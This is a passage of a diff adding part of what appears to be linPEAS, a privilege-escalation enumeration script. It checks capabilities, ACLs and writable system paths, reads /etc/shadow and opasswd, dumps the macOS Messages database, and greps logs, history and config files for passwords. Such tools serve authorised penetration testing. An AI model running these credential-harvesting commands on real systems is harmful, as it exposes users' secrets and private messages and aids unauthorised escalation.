+ (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status"
+ echo ""
+ echo "Parent Shell capabilities:"
+ (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh"
+ else
+ echo "Current capabilities:"
+ cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g"
+ echo ""
+ echo "Shell capabilities:"
+ cat /proc/$PPID/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|0000003fffffffff,${SED_GREEN},g"
+ fi
+ echo ""
+ echo "Files with capabilities (limited to 50):"
+ getcap -r / 2>/dev/null | head -n 50 | while read cb; do
+ capsVB_vuln=""
+
+ for capVB in $capsVB; do
+ capname="$(echo $capVB | cut -d ':' -f 1)"
+ capbins="$(echo $capVB | cut -d ':' -f 2)"
+ if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then
+ echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ capsVB_vuln="1"
+ break
+ fi
+ done
+
+ if ! [ "$capsVB_vuln" ]; then
+ echo "$cb" | sed -${E} "s,$capsB,${SED_RED},"
+ fi
+
+ if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then
+ echo "$cb is writable" | sed -${E} "s,.*,${SED_RED},"
+ fi
+ done
+ echo ""
+fi
+
+##-- IF) Users with capabilities
+if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then
+ print_2title "Users with capabilities"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities"
+ if [ -f "/etc/security/capability.conf" ]; then
+ grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+ else echo_not_found "/etc/security/capability.conf"
+ fi
+ echo ""
+fi
+
+##-- IF) AppArmor profiles to prevent suid/capabilities abuse
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then
+ print_2title "AppArmor binary profiles"
+ ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\."
+ echo ""
+ fi
+fi
+
+##-- IF) Files with ACLs
+print_2title "Files with ACLs (limited to 50)"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls"
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+else
+ ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+fi
+
+if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow)
+ ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+fi
+echo ""
+
+##-- IF) Files with ResourceFork
+#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER
+# print_2title "Files with ResourceFork"
+# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads"
+# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork"
+#fi
+#echo ""
+
+##-- IF) .sh files in PATH
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title ".sh files in path"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path"
+ echo $PATH | tr ":" "\n" | while read d; do
+ for f in $(find "$d" -name "*.sh" 2>/dev/null); do
+ if ! [ "$IAMROOT" ] && [ -O "$f" ]; then
+ echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED},"
+ elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits)
+ echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ else
+ echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},";
+ fi
+ done
+ done
+ echo ""
+
+ broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken)
+ if [ "$broken_links" ] || [ "$DEBUG" ]; then
+ print_2title "Broken links in path"
+ echo $PATH | tr ":" "\n" | while read d; do
+ find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},";
+ done
+ echo ""
+ fi
+fi
+
+##-- IF) Executable files added by user
+print_2title "Executable files added by user (limit 70)"
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort | tail -n 70
+else
+ find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort | tail -n 70
+fi
+
+if [ "$MACPEAS" ]; then
+ print_2title "Unsigned Applications"
+ macosNotSigned /System/Applications
+fi
+
+##-- IF) Unexpected in /opt
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ if [ "$(ls /opt 2>/dev/null)" ]; then
+ print_2title "Unexpected in /opt (usually empty)"
+ ls -la /opt
+ echo ""
+ fi
+fi
+
+##-- IF) Unexpected folders in /
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Unexpected in root"
+ if [ "$MACPEAS" ]; then
+ (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
+ else
+ (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
+ fi
+ echo ""
+fi
+
+##-- IF) Files (scripts) in /etc/profile.d/
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Files (scripts) in /etc/profile.d/"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files"
+ if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
+ (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/"
+ check_critial_root_path "/etc/profile"
+ check_critial_root_path "/etc/profile.d/"
+ fi
+ echo ""
+fi
+
+ ##-- IF) Files (scripts) in /etc/init.d/
+ if ! [ "$SEARCH_IN_FOLDER" ]; then
+print_2title "Permissions in init, init.d, systemd, and rc.d"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d"
+ if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
+ check_critial_root_path "/etc/init/"
+ check_critial_root_path "/etc/init.d/"
+ check_critial_root_path "/etc/rc.d/init.d"
+ check_critial_root_path "/usr/local/etc/rc.d"
+ check_critial_root_path "/etc/rc.d"
+ check_critial_root_path "/etc/systemd/"
+ check_critial_root_path "/lib/systemd/"
+ fi
+
+ echo ""
+fi
+
+##-- IF) Hashes in passwd file
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_list "Hashes inside passwd file? ........... "
+ if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+
+ ##-- IF) Writable in passwd file
+ print_list "Writable passwd file? ................ "
+ if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ else echo_no
+ fi
+
+ ##-- IF) Credentials in fstab
+ print_list "Credentials in fstab/mtab? ........... "
+ if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+
+ ##-- IF) Read shadow files
+ print_list "Can I read shadow files? ............. "
+ if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+ else echo_no
+ fi
+
+ print_list "Can I read shadow plists? ............ "
+ possible_check=""
+ (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
+
+ print_list "Can I write shadow plists? ........... "
+ possible_check=""
+ (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
+
+ ##-- IF) Read opasswd file
+ print_list "Can I read opasswd file? ............. "
+ if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo ""
+ else echo_no
+ fi
+
+ ##-- IF) network-scripts
+ print_list "Can I write in network-scripts? ...... "
+ if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ else echo_no
+ fi
+
+ ##-- IF) Read root dir
+ print_list "Can I read root folder? .............. "
+ (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no
+ echo ""
+fi
+
+##-- IF) Root files in home dirs
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Searching root files in home dirs (limit 30)"
+ (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found
+ echo ""
+fi
+
+##-- IF) Others files in my dirs
+if ! [ "$IAMROOT" ]; then
+ print_2title "Searching folders owned by me containing others files on it (limit 100)"
+ (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g"
+ echo ""
+fi
+
+##-- IF) Readable files belonging to root and not world readable
+if ! [ "$IAMROOT" ]; then
+ print_2title "Readable files belonging to root and readable by me but not world readable"
+ (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found
+ echo ""
+fi
+
+##-- IF) Modified interesting files into specific folders in the last 5mins
+print_2title "Modified interesting files in the last 5mins (limit 100)"
+find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED},"
+echo ""
+
+##-- IF) Writable log files
+if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below
+print_2title "Writable log files (logrotten) (limit 50)"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation"
+ logrotate --version 2>/dev/null || echo_not_found "logrotate"
+ lastWlogFolder="ImPOsSiBleeElastWlogFolder"
+ logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50)
+ printf "%s\n" "$logfind" | while read log; do
+ if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
+ if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
+ elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
+ elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
+ elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g";
+ fi
+ fi
+ done
+fi
+
+echo ""
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ ##-- IF) Files inside my home
+ print_2title "Files inside $HOME (limit 20)"
+ (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found
+ echo ""
+
+ ##-- IF) Files inside /home
+ print_2title "Files inside others home (limit 20)"
+ (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found
+ echo ""
+
+ ##-- IF) Mail applications
+ print_2title "Searching installed mail applications"
+ ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps"
+ echo ""
+
+ ##-- IF) Mails
+ print_2title "Mails (limit 50)"
+ (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found
+ echo ""
+
+ ##-- IF) Backup folders
+ if [ "$backup_folders" ] || [ "$DEBUG" ]; then
+ print_2title "Backup folders"
+ printf "%s\n" "$backup_folders" | while read b ; do
+ ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g";
+ ls -l "$b" 2>/dev/null && echo ""
+ done
+ echo ""
+ fi
+fi
+
+##-- IF) Backup files
+print_2title "Backup files (limited 100)"
+backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null)
+printf "%s\n" "$backs" | head -n 100 | while read b ; do
+ if [ -r "$b" ]; then
+ ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g";
+ fi;
+done
+echo ""
+
+##-- IF) DB files
+if [ "$MACPEAS" ]; then
+ print_2title "Reading messages database"
+ sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null
+ sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null
+ sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null
+
+fi
+
+
+if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then
+ print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)"
+ FILECMD="$(command -v file 2>/dev/null)"
+ printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
+ if [ "$FILECMD" ]; then
+ echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
+ else
+ echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
+ fi
+ done
+ SQLITEPYTHON=""
+ echo ""
+ printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
+ if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
+ if [ "$(command -v sqlite3 2>/dev/null)" ]; then
+ tables=$(sqlite3 $f ".tables" 2>/dev/null)
+ #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
+ elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then
+ SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null)
+ tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null)
+ #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
+ else
+ tables=""
+ fi
+ if [ "$tables" ] || [ "$DEBUG" ]; then
+ printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC
+ printf "%s\n" "$tables" | while read t; do
+ columns=""
+ # Search for credentials inside the table using sqlite3
+ if [ -z "$SQLITEPYTHON" ]; then
+ columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE")
+ # Search for credentials inside the table using python
+ else
+ columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
+ fi
+ #Check found columns for interesting fields
+ INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
+ if [ "$INTCOLUMN" ]; then
+ printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
+ printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g"
+ (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head
+ echo ""
+ fi
+ done
+ fi
+ fi
+ done
+fi
+echo ""
+
+if [ "$MACPEAS" ]; then
+ print_2title "Downloaded Files"
+ sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|"
+fi
+
+##-- IF) Web files
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Web files?(output limit)"
+ ls -alhR /var/www/ 2>/dev/null | head
+ ls -alhR /srv/www/htdocs/ 2>/dev/null | head
+ ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head
+ ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head
+ echo ""
+fi
+
+##-- IF) All hidden files
+print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)"
+find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70
+echo ""
+
+##-- IF) Readable files in /tmp, /var/tmp, bachups
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)"
+ filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70)
+ printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done
+ echo ""
+fi
+
+##-- IF) Interesting writable files by ownership or all
+if ! [ "$IAMROOT" ]; then
+ print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
+ #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
+ obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
+ printf "%s\n" "$obmowbe" | while read entry; do
+ if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
+ elif echo "$entry" | grep -qE "$writeVB"; then
+ echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
+ else
+ echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
+ fi
+ done
+ echo ""
+fi
+
+##-- IF) Interesting writable files by group
+if ! [ "$IAMROOT" ]; then
+ print_2title "Interesting GROUP writable files (not in Home) (max 500)"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
+ for g in $(groups); do
+ iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
+ if [ "$iwfbg" ] || [ "$DEBUG" ]; then
+ printf " Group $GREEN$g:\n$NC";
+ printf "%s\n" "$iwfbg" | while read entry; do
+ if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
+ elif echo "$entry" | grep -Eq "$writeVB"; then
+ echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
+ else
+ echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
+ fi
+ done
+ fi
+ done
+ echo ""
+fi
+
+##-- IF) Passwords in history cmd
+if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then
+ print_2title "Searching passwords in history cmd"
+ history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+ echo ""
+fi
+
+##-- IF) Passwords in history files
+if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then
+ print_2title "Searching passwords in history files"
+ printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done
+ echo ""
+fi
+
+##-- IF) Passwords in config PHP files
+if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then
+ print_2title "Searching passwords in config PHP files"
+ printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done
+ echo ""
+fi
+
+##-- IF) Passwords files in home
+if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then
+ print_2title "Searching *password* or *credential* files in home (limit 70)"
+ (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
+ echo ""
+fi
+
+##-- IF) TTY passwords
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Checking for TTY (sudo/su) passwords in audit logs"
+ aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
+ find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
+ echo ""
+fi
+
+##-- IF) IPs inside logs
+if [ "$DEBUG" ]; then
+ print_2title "Searching IPs inside logs (limit 70)"
+ (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70
+ echo ""
+fi
+
+##-- IF) Passwords inside logs
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Searching passwords inside logs (limit 70)"
+ (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
+ echo ""
+fi
+
+if [ "$DEBUG" ]; then
+ ##-- IF) Emails inside logs
+ print_2title "Searching emails inside logs (limit 70)"
+ (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
+ echo ""
+fi
+
+
+
+
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
+ ##-- IF) Find possible files with passwords
+ print_2title "Searching passwords inside key folders (limit 70) - only PHP files"
+ if ! [ "$SEARCH_IN_FOLDER" ]; then
